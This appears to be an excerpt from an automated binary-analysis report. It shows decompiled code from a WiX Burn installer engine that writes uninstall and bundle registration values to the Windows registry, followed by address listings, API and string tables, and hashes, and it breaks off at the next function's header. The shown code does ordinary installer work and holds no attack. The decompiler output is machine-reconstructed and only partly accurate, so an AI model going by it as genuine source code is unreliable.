									_t186 = E00432ABE(_v8, L"BundleAddonCode",  *((intOrPtr*)(_t185 + 0x24)),  *((intOrPtr*)(_t185 + 0x28)));
									__eflags = _t186;
									if(_t186 >= 0) {
										_t186 = E00432ABE(_v8, L"BundleDetectCode",  *((intOrPtr*)(_t185 + 0x14)),  *((intOrPtr*)(_t185 + 0x18)));
										__eflags = _t186;
										if(_t186 >= 0) {
											_t186 = E00432ABE(_v8, L"BundlePatchCode",  *((intOrPtr*)(_t185 + 0x2c)),  *((intOrPtr*)(_t185 + 0x30)));
											__eflags = _t186;
											if(_t186 >= 0) {
												_t181 =  *(_t185 + 0x38);
												_t184 =  *(_t185 + 0x3c);
												_push(_t181 & 0x0000ffff);
												_t135 = _t184;
												_t182 = (_t135 << 0x00000020 | _t181) >> 0x10;
												_push((_t135 << 0x00000020 | _t181) >> 0x10 & 0x0000ffff);
												_push(_t184 & 0x0000ffff);
												_v16 = _t184;
												_t183 = _t184 >> 0x10;
												_t186 = E00432BF4((_t135 << 0x00000020 | _t181) >> 0x10, _v8, L"BundleVersion", L"%hu.%hu.%hu.%hu", _t184 >> 0x10);
												_t187 = _t187 + 0x1c;
												__eflags = _t186;
												if(_t186 >= 0) {
													__eflags =  *(_t185 + 0x44);
													if( *(_t185 + 0x44) == 0) {
														L21:
														__eflags =  *(_t185 + 0x10);
														if( *(_t185 + 0x10) == 0) {
															L24:
															_t186 = E00432BF4(_t182, _v8, L"EngineVersion", L"%hs", "3.8.1128.0");
															_t187 = _t187 + 0x10;
															__eflags = _t186;
															if(_t186 >= 0) {
																_t186 = E00432BF4(_t182, _v8, L"DisplayIcon", L"%s,0",  *((intOrPtr*)(_t185 + 0x54)));
																_t187 = _t187 + 0x10;
																__eflags = _t186;
																if(_t186 >= 0) {
																	_t143 = E004099CC(_t182, _t185, _a12,  &_v12);
																	__eflags = _t143;
																	_t144 = _v12;
																	if(_t143 < 0) {
																		_t144 =  *((intOrPtr*)(_t185 + 0x60));
																	}
																	_t186 = E00432A16(_t182, _v8, L"DisplayName", _t144);
																	__eflags = _t186;
																	if(_t186 >= 0) {
																		__eflags =  *(_t185 + 0x64);
																		if( *(_t185 + 0x64) == 0) {
																			L35:
																			__eflags =  *(_t185 + 0x68);
																			if( *(_t185 + 0x68) == 0) {
																				L38:
																				__eflags =  *(_t185 + 0x6c);
																				if( *(_t185 + 0x6c) == 0) {
																					L41:
																					__eflags =  *(_t185 + 0x70);
																					if( *(_t185 + 0x70) == 0) {
																						L44:
																						__eflags =  *(_t185 + 0x74);
																						if( *(_t185 + 0x74) == 0) {
																							L47:
																							__eflags =  *(_t185 + 0x78);
																							if( *(_t185 + 0x78) == 0) {
																								L50:
																								__eflags =  *(_t185 + 0x7c);
																								if( *(_t185 + 0x7c) == 0) {
																									L55:
																									_t146 =  *(_t185 + 0x80);
																									__eflags = _t146;
																									if(_t146 == 0) {
																										L58:
																										_t147 =  *(_t185 + 0x84);
																										__eflags = _t147;
																										if(_t147 == 0) {
																											L61:
																											_t148 =  *((intOrPtr*)(_t185 + 0x88));
																											__eflags = _t148 - 1;
																											if(_t148 != 1) {
																												__eflags = _t148 - 2;
																												if(_t148 == 2) {
																													goto L69;
																												} else {
																													_t186 = E00432BF4(_t182, _v8, L"ModifyPath", L"\"%ls\" /modify",  *((intOrPtr*)(_t185 + 0x54)));
																													_t187 = _t187 + 0x10;
																													__eflags = _t186;
																													if(_t186 >= 0) {
																														_t186 = E004329C8(_v8, L"NoElevateOnModify", 1);
																														__eflags = _t186;
																														if(_t186 >= 0) {
																															goto L69;
																														} else {
																															_push(L"NoElevateOnModify");
																															goto L95;
																														}
																													} else {
																														_push(L"ModifyPath");
																														goto L95;
																													}
																												}
																											} else {
																												_t186 = E004329C8(_v8, L"NoModify", _t148);
																												__eflags = _t186;
																												if(_t186 >= 0) {
																													L69:
																													__eflags =  *(_t185 + 0x8c);
																													if( *(_t185 + 0x8c) == 0) {
																														L72:
																														__eflags =  *(_t185 + 4);
																														if( *(_t185 + 4) != 0) {
																															L75:
																															_t186 = E00432BF4(_t182, _v8, L"QuietUninstallString", L"\"%ls\" /uninstall /quiet",  *((intOrPtr*)(_t185 + 0x54)));
																															_t187 = _t187 + 0x10;
																															__eflags = _t186;
																															if(_t186 >= 0) {
																																__eflags =  *((intOrPtr*)(_t185 + 0x88)) - 2;
																																_t177 = L" /uninstall";
																																_t151 =  !=  ? L" /uninstall" : L"/modify";
																																_push( !=  ? L" /uninstall" : L"/modify");
																																_t186 = E00432BF4(L" /uninstall", _v8, L"UninstallString", L"\"%ls\" %ls",  *((intOrPtr*)(_t185 + 0x54)));
																																_t187 = _t187 + 0x14;
																																__eflags = _t186;
																																if(_t186 >= 0) {
																																	__eflags =  *(_t185 + 0x98);
																																	if( *(_t185 + 0x98) == 0) {
																																		L82:
																																		__eflags =  *(_t185 + 0x9c);
																																		if( *(_t185 + 0x9c) == 0) {
																																			goto L85;
																																		} else {
																																			_t186 = E0040A3B1(_t177, _t185, _a12);
																																			__eflags = _t186;
																																			if(_t186 >= 0) {
																																				goto L85;
																																			} else {
																																				_push("Failed to write update registration.");
																																				goto L102;
																																			}
																																		}
																																	} else {
																																		_t97 = _t185 + 0x94; // 0x14c
																																		_t186 = E0040A284( *_t185, _t97);
																																		__eflags = _t186;
																																		if(_t186 >= 0) {
																																			goto L82;
																																		} else {
																																			_push("Failed to write software tags.");
																																			goto L102;
																																		}
																																	}
																																} else {
																																	_push(L"UninstallString");
																																	goto L95;
																																}
																															} else {
																																_push(L"QuietUninstallString");
																																goto L95;
																															}
																														} else {
																															_t186 = E004329C8(_v8, L"SystemComponent", 1);
																															__eflags = _t186;
																															if(_t186 >= 0) {
																																goto L75;
																															} else {
																																_push(L"SystemComponent");
																																goto L95;
																															}
																														}
																													} else {
																														_t186 = E004329C8(_v8, L"NoRemove",  *((intOrPtr*)(_t185 + 0x90)));
																														__eflags = _t186;
																														if(_t186 >= 0) {
																															goto L72;
																														} else {
																															_push(L"NoRemove");
																															goto L95;
																														}
																													}
																												} else {
																													_push(L"NoModify");
																													goto L95;
																												}
																											}
																										} else {
																											_t186 = E00432A16(_t182, _v8, L"Contact", _t147);
																											__eflags = _t186;
																											if(_t186 >= 0) {
																												goto L61;
																											} else {
																												_push(L"Contact");
																												goto L95;
																											}
																										}
																									} else {
																										_t186 = E00432A16(_t182, _v8, L"Comments", _t146);
																										__eflags = _t186;
																										if(_t186 >= 0) {
																											goto L58;
																										} else {
																											_push(L"Comments");
																											goto L95;
																										}
																									}
																								} else {
																									_t186 = E00432A16(_t182, _v8, L"ParentDisplayName",  *(_t185 + 0x7c));
																									__eflags = _t186;
																									if(_t186 >= 0) {
																										_t186 = E00432A16(_t182, _v8, L"ParentKeyName",  *(_t185 + 0x7c));
																										__eflags = _t186;
																										if(_t186 >= 0) {
																											goto L55;
																										} else {
																											_push(L"ParentKeyName");
																											goto L95;
																										}
																									} else {
																										_push(L"ParentDisplayName");
																										goto L95;
																									}
																								}
																							} else {
																								_t186 = E00432A16(_t182, _v8, L"URLUpdateInfo",  *(_t185 + 0x78));
																								__eflags = _t186;
																								if(_t186 >= 0) {
																									goto L50;
																								} else {
																									_push(L"URLUpdateInfo");
																									goto L95;
																								}
																							}
																						} else {
																							_t186 = E00432A16(_t182, _v8, L"URLInfoAbout",  *(_t185 + 0x74));
																							__eflags = _t186;
																							if(_t186 >= 0) {
																								goto L47;
																							} else {
																								_push(L"URLInfoAbout");
																								goto L95;
																							}
																						}
																					} else {
																						_t186 = E00432A16(_t182, _v8, L"HelpTelephone",  *(_t185 + 0x70));
																						__eflags = _t186;
																						if(_t186 >= 0) {
																							goto L44;
																						} else {
																							_push(L"HelpTelephone");
																							goto L95;
																						}
																					}
																				} else {
																					_t186 = E00432A16(_t182, _v8, L"HelpLink",  *(_t185 + 0x6c));
																					__eflags = _t186;
																					if(_t186 >= 0) {
																						goto L41;
																					} else {
																						_push(L"HelpLink");
																						goto L95;
																					}
																				}
																			} else {
																				_t186 = E00432A16(_t182, _v8, L"Publisher",  *(_t185 + 0x68));
																				__eflags = _t186;
																				if(_t186 >= 0) {
																					goto L38;
																				} else {
																					_push(L"Publisher");
																					goto L95;
																				}
																			}
																		} else {
																			_t186 = E00432A16(_t182, _v8, L"DisplayVersion",  *(_t185 + 0x64));
																			__eflags = _t186;
																			if(_t186 >= 0) {
																				goto L35;
																			} else {
																				_push(L"DisplayVersion");
																				goto L95;
																			}
																		}
																	} else {
																		_push(L"DisplayName");
																		goto L95;
																	}
																} else {
																	_push(L"DisplayIcon");
																	goto L95;
																}
															} else {
																_push(L"EngineVersion");
																goto L95;
															}
														} else {
															_t186 = E00432A16(_t182, _v8, L"BundleTag",  *(_t185 + 0x10));
															__eflags = _t186;
															if(_t186 >= 0) {
																goto L24;
															} else {
																_push(L"BundleTag");
																goto L95;
															}
														}
													} else {
														_t186 = E00432A16(_t182, _v8, L"BundleProviderKey",  *(_t185 + 0x44));
														__eflags = _t186;
														if(_t186 >= 0) {
															goto L21;
														} else {
															_push(L"BundleProviderKey");
															goto L95;
														}
													}
												} else {
													_push(L"BundleVersion");
													goto L95;
												}
											} else {
												_push(L"BundlePatchCode");
												goto L95;
											}
										} else {
											_push(L"BundleDetectCode");
											goto L95;
										}
									} else {
										_push(L"BundleAddonCode");
										goto L95;
									}
								} else {
									_push(L"BundleUpgradeCode");
									goto L95;
								}
							} else {
								_push(L"BundleCachePath");
								L95:
								_push("Failed to write %ls value.");
								goto L96;
							}
						}
					} else {
						_push("Failed to create registration key.");
						L102:
						_push(_t186);
						E00430A57();
					}
				} else {
					_t186 = E004135A7(_t177, _t185,  *_t185,  *((intOrPtr*)(_t185 + 0x48)),  *((intOrPtr*)(_t185 + 0xc)), _a16 + 4, _a4);
					if(_t186 >= 0) {
						goto L3;
					} else {
						_push(_a4);
						_push("Failed to cache bundle from path: %ls");
						L96:
						_push(_t186);
						E00430A57();
					}
				}
				if(_v12 != 0) {
					E004380AB(_v12);
				}
				if(_v8 != 0) {
					RegCloseKey(_v8);
				}
				return _t186;
			}





















                                                                                                                                                                  0x0040ad64
                                                                                                                                                                  0x0040ad67
                                                                                                                                                                  0x0040ad6a
                                                                                                                                                                  0x0040ad6d
                                                                                                                                                                  0x0040ad99
                                                                                                                                                                  0x0040adad
                                                                                                                                                                  0x0040adaf
                                                                                                                                                                  0x0040adb1
                                                                                                                                                                  0x0040adbd
                                                                                                                                                                  0x0040adc1
                                                                                                                                                                  0x0040b26e
                                                                                                                                                                  0x0040b26e
                                                                                                                                                                  0x0040b272
                                                                                                                                                                  0x0040b2c3
                                                                                                                                                                  0x0040b2c3
                                                                                                                                                                  0x0040b2c7
                                                                                                                                                                  0x0040b2dc
                                                                                                                                                                  0x0040b2e8
                                                                                                                                                                  0x0040b2ea
                                                                                                                                                                  0x0040b2ec
                                                                                                                                                                  0x0040b2ee
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040b2ee
                                                                                                                                                                  0x0040b2c9
                                                                                                                                                                  0x0040b2cf
                                                                                                                                                                  0x0040b2d1
                                                                                                                                                                  0x0040b2d3
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040b2d5
                                                                                                                                                                  0x0040b2d5
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040b2d5
                                                                                                                                                                  0x0040b2d3
                                                                                                                                                                  0x0040b274
                                                                                                                                                                  0x0040b277
                                                                                                                                                                  0x0040b27a
                                                                                                                                                                  0x0040b27e
                                                                                                                                                                  0x0040b281
                                                                                                                                                                  0x0040b283
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040b285
                                                                                                                                                                  0x0040b285
                                                                                                                                                                  0x0040b28f
                                                                                                                                                                  0x0040b291
                                                                                                                                                                  0x0040b292
                                                                                                                                                                  0x0040b294
                                                                                                                                                                  0x0040b296
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040b296
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040b287
                                                                                                                                                                  0x0040b287
                                                                                                                                                                  0x0040b289
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040b28b
                                                                                                                                                                  0x0040b28b
                                                                                                                                                                  0x0040b28d
                                                                                                                                                                  0x0040b298
                                                                                                                                                                  0x0040b298
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040b29a
                                                                                                                                                                  0x0040b2a8
                                                                                                                                                                  0x0040b2aa
                                                                                                                                                                  0x0040b2ac
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040b2ae
                                                                                                                                                                  0x0040b2ae
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040b2ae
                                                                                                                                                                  0x0040b2ac
                                                                                                                                                                  0x0040b289
                                                                                                                                                                  0x0040b285
                                                                                                                                                                  0x0040b283
                                                                                                                                                                  0x0040adc7
                                                                                                                                                                  0x0040add7
                                                                                                                                                                  0x0040add9
                                                                                                                                                                  0x0040addb
                                                                                                                                                                  0x0040adfa
                                                                                                                                                                  0x0040adfc
                                                                                                                                                                  0x0040adfe
                                                                                                                                                                  0x0040ae1d
                                                                                                                                                                  0x0040ae1f
                                                                                                                                                                  0x0040ae21
                                                                                                                                                                  0x0040ae40
                                                                                                                                                                  0x0040ae42
                                                                                                                                                                  0x0040ae44
                                                                                                                                                                  0x0040ae63
                                                                                                                                                                  0x0040ae65
                                                                                                                                                                  0x0040ae67
                                                                                                                                                                  0x0040ae73
                                                                                                                                                                  0x0040ae76
                                                                                                                                                                  0x0040ae7c
                                                                                                                                                                  0x0040ae7d
                                                                                                                                                                  0x0040ae7f
                                                                                                                                                                  0x0040ae89
                                                                                                                                                                  0x0040ae8d
                                                                                                                                                                  0x0040ae8e
                                                                                                                                                                  0x0040ae91
                                                                                                                                                                  0x0040aea7
                                                                                                                                                                  0x0040aea9
                                                                                                                                                                  0x0040aeac
                                                                                                                                                                  0x0040aeae
                                                                                                                                                                  0x0040aeba
                                                                                                                                                                  0x0040aebd
                                                                                                                                                                  0x0040aedf
                                                                                                                                                                  0x0040aedf
                                                                                                                                                                  0x0040aee2
                                                                                                                                                                  0x0040af04
                                                                                                                                                                  0x0040af1b
                                                                                                                                                                  0x0040af1d
                                                                                                                                                                  0x0040af20
                                                                                                                                                                  0x0040af22
                                                                                                                                                                  0x0040af43
                                                                                                                                                                  0x0040af45
                                                                                                                                                                  0x0040af48
                                                                                                                                                                  0x0040af4a
                                                                                                                                                                  0x0040af5e
                                                                                                                                                                  0x0040af63
                                                                                                                                                                  0x0040af65
                                                                                                                                                                  0x0040af68
                                                                                                                                                                  0x0040af6a
                                                                                                                                                                  0x0040af6a
                                                                                                                                                                  0x0040af7b
                                                                                                                                                                  0x0040af7d
                                                                                                                                                                  0x0040af7f
                                                                                                                                                                  0x0040af8b
                                                                                                                                                                  0x0040af8e
                                                                                                                                                                  0x0040afb0
                                                                                                                                                                  0x0040afb0
                                                                                                                                                                  0x0040afb3
                                                                                                                                                                  0x0040afd5
                                                                                                                                                                  0x0040afd5
                                                                                                                                                                  0x0040afd8
                                                                                                                                                                  0x0040affa
                                                                                                                                                                  0x0040affa
                                                                                                                                                                  0x0040affd
                                                                                                                                                                  0x0040b01f
                                                                                                                                                                  0x0040b01f
                                                                                                                                                                  0x0040b022
                                                                                                                                                                  0x0040b044
                                                                                                                                                                  0x0040b044
                                                                                                                                                                  0x0040b047
                                                                                                                                                                  0x0040b069
                                                                                                                                                                  0x0040b069
                                                                                                                                                                  0x0040b06c
                                                                                                                                                                  0x0040b0ae
                                                                                                                                                                  0x0040b0ae
                                                                                                                                                                  0x0040b0b4
                                                                                                                                                                  0x0040b0b6
                                                                                                                                                                  0x0040b0d6
                                                                                                                                                                  0x0040b0d6
                                                                                                                                                                  0x0040b0dc
                                                                                                                                                                  0x0040b0de
                                                                                                                                                                  0x0040b0fe
                                                                                                                                                                  0x0040b0fe
                                                                                                                                                                  0x0040b104
                                                                                                                                                                  0x0040b107
                                                                                                                                                                  0x0040b127
                                                                                                                                                                  0x0040b12a
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040b12c
                                                                                                                                                                  0x0040b141
                                                                                                                                                                  0x0040b143
                                                                                                                                                                  0x0040b146
                                                                                                                                                                  0x0040b148
                                                                                                                                                                  0x0040b163
                                                                                                                                                                  0x0040b165
                                                                                                                                                                  0x0040b167
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040b169
                                                                                                                                                                  0x0040b169
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040b169
                                                                                                                                                                  0x0040b14a
                                                                                                                                                                  0x0040b14a
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040b14a
                                                                                                                                                                  0x0040b148
                                                                                                                                                                  0x0040b109
                                                                                                                                                                  0x0040b117
                                                                                                                                                                  0x0040b119
                                                                                                                                                                  0x0040b11b
                                                                                                                                                                  0x0040b173
                                                                                                                                                                  0x0040b173
                                                                                                                                                                  0x0040b179
                                                                                                                                                                  0x0040b19e
                                                                                                                                                                  0x0040b19e
                                                                                                                                                                  0x0040b1a1
                                                                                                                                                                  0x0040b1c2
                                                                                                                                                                  0x0040b1d7
                                                                                                                                                                  0x0040b1d9
                                                                                                                                                                  0x0040b1dc
                                                                                                                                                                  0x0040b1de
                                                                                                                                                                  0x0040b1ea
                                                                                                                                                                  0x0040b1f1
                                                                                                                                                                  0x0040b1fb
                                                                                                                                                                  0x0040b1fe
                                                                                                                                                                  0x0040b214
                                                                                                                                                                  0x0040b216
                                                                                                                                                                  0x0040b219
                                                                                                                                                                  0x0040b21b
                                                                                                                                                                  0x0040b227
                                                                                                                                                                  0x0040b22d
                                                                                                                                                                  0x0040b24d
                                                                                                                                                                  0x0040b24d
                                                                                                                                                                  0x0040b253
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040b255
                                                                                                                                                                  0x0040b25e
                                                                                                                                                                  0x0040b260
                                                                                                                                                                  0x0040b262
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040b264
                                                                                                                                                                  0x0040b264
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040b264
                                                                                                                                                                  0x0040b262
                                                                                                                                                                  0x0040b22f
                                                                                                                                                                  0x0040b22f
                                                                                                                                                                  0x0040b23d
                                                                                                                                                                  0x0040b23f
                                                                                                                                                                  0x0040b241
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040b243
                                                                                                                                                                  0x0040b243
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040b243
                                                                                                                                                                  0x0040b241
                                                                                                                                                                  0x0040b21d
                                                                                                                                                                  0x0040b21d
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040b21d
                                                                                                                                                                  0x0040b1e0
                                                                                                                                                                  0x0040b1e0
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040b1e0
                                                                                                                                                                  0x0040b1a3
                                                                                                                                                                  0x0040b1b2
                                                                                                                                                                  0x0040b1b4
                                                                                                                                                                  0x0040b1b6
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040b1b8
                                                                                                                                                                  0x0040b1b8
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040b1b8
                                                                                                                                                                  0x0040b1b6
                                                                                                                                                                  0x0040b17b
                                                                                                                                                                  0x0040b18e
                                                                                                                                                                  0x0040b190
                                                                                                                                                                  0x0040b192
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040b194
                                                                                                                                                                  0x0040b194
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040b194
                                                                                                                                                                  0x0040b192
                                                                                                                                                                  0x0040b11d
                                                                                                                                                                  0x0040b11d
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040b11d
                                                                                                                                                                  0x0040b11b
                                                                                                                                                                  0x0040b0e0
                                                                                                                                                                  0x0040b0ee
                                                                                                                                                                  0x0040b0f0
                                                                                                                                                                  0x0040b0f2
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040b0f4
                                                                                                                                                                  0x0040b0f4
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040b0f4
                                                                                                                                                                  0x0040b0f2
                                                                                                                                                                  0x0040b0b8
                                                                                                                                                                  0x0040b0c6
                                                                                                                                                                  0x0040b0c8
                                                                                                                                                                  0x0040b0ca
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040b0cc
                                                                                                                                                                  0x0040b0cc
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040b0cc
                                                                                                                                                                  0x0040b0ca
                                                                                                                                                                  0x0040b06e
                                                                                                                                                                  0x0040b07e
                                                                                                                                                                  0x0040b080
                                                                                                                                                                  0x0040b082
                                                                                                                                                                  0x0040b09e
                                                                                                                                                                  0x0040b0a0
                                                                                                                                                                  0x0040b0a2
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040b0a4
                                                                                                                                                                  0x0040b0a4
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040b0a4
                                                                                                                                                                  0x0040b084
                                                                                                                                                                  0x0040b084
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040b084
                                                                                                                                                                  0x0040b082
                                                                                                                                                                  0x0040b049
                                                                                                                                                                  0x0040b059
                                                                                                                                                                  0x0040b05b
                                                                                                                                                                  0x0040b05d
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040b05f
                                                                                                                                                                  0x0040b05f
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040b05f
                                                                                                                                                                  0x0040b05d
                                                                                                                                                                  0x0040b024
                                                                                                                                                                  0x0040b034
                                                                                                                                                                  0x0040b036
                                                                                                                                                                  0x0040b038
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040b03a
                                                                                                                                                                  0x0040b03a
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040b03a
                                                                                                                                                                  0x0040b038
                                                                                                                                                                  0x0040afff
                                                                                                                                                                  0x0040b00f
                                                                                                                                                                  0x0040b011
                                                                                                                                                                  0x0040b013
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040b015
                                                                                                                                                                  0x0040b015
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040b015
                                                                                                                                                                  0x0040b013
                                                                                                                                                                  0x0040afda
                                                                                                                                                                  0x0040afea
                                                                                                                                                                  0x0040afec
                                                                                                                                                                  0x0040afee
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040aff0
                                                                                                                                                                  0x0040aff0
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040aff0
                                                                                                                                                                  0x0040afee
                                                                                                                                                                  0x0040afb5
                                                                                                                                                                  0x0040afc5
                                                                                                                                                                  0x0040afc7
                                                                                                                                                                  0x0040afc9
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040afcb
                                                                                                                                                                  0x0040afcb
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040afcb
                                                                                                                                                                  0x0040afc9
                                                                                                                                                                  0x0040af90
                                                                                                                                                                  0x0040afa0
                                                                                                                                                                  0x0040afa2
                                                                                                                                                                  0x0040afa4
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040afa6
                                                                                                                                                                  0x0040afa6
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040afa6
                                                                                                                                                                  0x0040afa4
                                                                                                                                                                  0x0040af81
                                                                                                                                                                  0x0040af81
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040af81
                                                                                                                                                                  0x0040af4c
                                                                                                                                                                  0x0040af4c
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040af4c
                                                                                                                                                                  0x0040af24
                                                                                                                                                                  0x0040af24
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040af24
                                                                                                                                                                  0x0040aee4
                                                                                                                                                                  0x0040aef4
                                                                                                                                                                  0x0040aef6
                                                                                                                                                                  0x0040aef8
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040aefa
                                                                                                                                                                  0x0040aefa
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040aefa
                                                                                                                                                                  0x0040aef8
                                                                                                                                                                  0x0040aebf
                                                                                                                                                                  0x0040aecf
                                                                                                                                                                  0x0040aed1
                                                                                                                                                                  0x0040aed3
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040aed5
                                                                                                                                                                  0x0040aed5
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040aed5
                                                                                                                                                                  0x0040aed3
                                                                                                                                                                  0x0040aeb0
                                                                                                                                                                  0x0040aeb0
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040aeb0
                                                                                                                                                                  0x0040ae69
                                                                                                                                                                  0x0040ae69
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040ae69
                                                                                                                                                                  0x0040ae46
                                                                                                                                                                  0x0040ae46
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040ae46
                                                                                                                                                                  0x0040ae23
                                                                                                                                                                  0x0040ae23
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040ae23
                                                                                                                                                                  0x0040ae00
                                                                                                                                                                  0x0040ae00
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040ae00
                                                                                                                                                                  0x0040addd
                                                                                                                                                                  0x0040addd
                                                                                                                                                                  0x0040b2b3
                                                                                                                                                                  0x0040b2b3
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040b2b3
                                                                                                                                                                  0x0040addb
                                                                                                                                                                  0x0040adb3
                                                                                                                                                                  0x0040adb3
                                                                                                                                                                  0x0040b2f3
                                                                                                                                                                  0x0040b2f3
                                                                                                                                                                  0x0040b2f4
                                                                                                                                                                  0x0040b2fa
                                                                                                                                                                  0x0040ad6f
                                                                                                                                                                  0x0040ad86
                                                                                                                                                                  0x0040ad8a
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040ad8c
                                                                                                                                                                  0x0040ad8c
                                                                                                                                                                  0x0040ad8f
                                                                                                                                                                  0x0040b2b8
                                                                                                                                                                  0x0040b2b8
                                                                                                                                                                  0x0040b2b9
                                                                                                                                                                  0x0040b2be
                                                                                                                                                                  0x0040ad8a
                                                                                                                                                                  0x0040b2fe
                                                                                                                                                                  0x0040b303
                                                                                                                                                                  0x0040b303
                                                                                                                                                                  0x0040b30b
                                                                                                                                                                  0x0040b310
                                                                                                                                                                  0x0040b310
                                                                                                                                                                  0x0040b31c

                                                                                                                                                                  APIs
                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,000000B8,00000000,00000001,00000000,?,?,00020006,00000000,00000001,00000000), ref: 0040B310
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Close
                                                                                                                                                                  • String ID: /uninstall$"%ls" %ls$"%ls" /modify$"%ls" /uninstall /quiet$%hs$%hu.%hu.%hu.%hu$%s,0$/modify$3.8.1128.0$BundleAddonCode$BundleCachePath$BundleDetectCode$BundlePatchCode$BundleProviderKey$BundleTag$BundleUpgradeCode$BundleVersion$Comments$Contact$DisplayIcon$DisplayName$DisplayVersion$EngineVersion$EstimatedSize$Failed to cache bundle from path: %ls$Failed to create registration key.$Failed to register the bundle dependency key.$Failed to update resume mode.$Failed to write %ls value.$Failed to write software tags.$Failed to write update registration.$HelpLink$HelpTelephone$ModifyPath$NoElevateOnModify$NoModify$NoRemove$ParentDisplayName$ParentKeyName$Publisher$QuietUninstallString$SystemComponent$URLInfoAbout$URLUpdateInfo$UninstallString
                                                                                                                                                                  • API String ID: 3535843008-4072303632
                                                                                                                                                                  • Opcode ID: 6f772b43b939d12f2b4750acb2bef13707333ee0d49179c94ec53917455393f6
                                                                                                                                                                  • Instruction ID: 0974e1a9faa4fc9fc413f9a5ed9bedf608dbe9382fae2f725bff0c0e3d2fe0c4
                                                                                                                                                                  • Opcode Fuzzy Hash: 6f772b43b939d12f2b4750acb2bef13707333ee0d49179c94ec53917455393f6
                                                                                                                                                                  • Instruction Fuzzy Hash: 34E17431E40726B7DB22AA50DE06F6E7661FB08710F20017BF910B62A1D77DAD21A7CD
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00407FA7, Relevance: 73.9, APIs: 3, Strings: 39, Instructions: 365COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 64%
                                                                                                                                                                  			E00407FA7(void* __ebx, void* __edi, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr* _t92;
				intOrPtr _t102;
				signed int _t103;
				int _t113;
				signed int _t136;
				intOrPtr* _t157;
				signed int _t160;
				signed int _t161;
				intOrPtr _t162;
				intOrPtr* _t165;
				void* _t175;
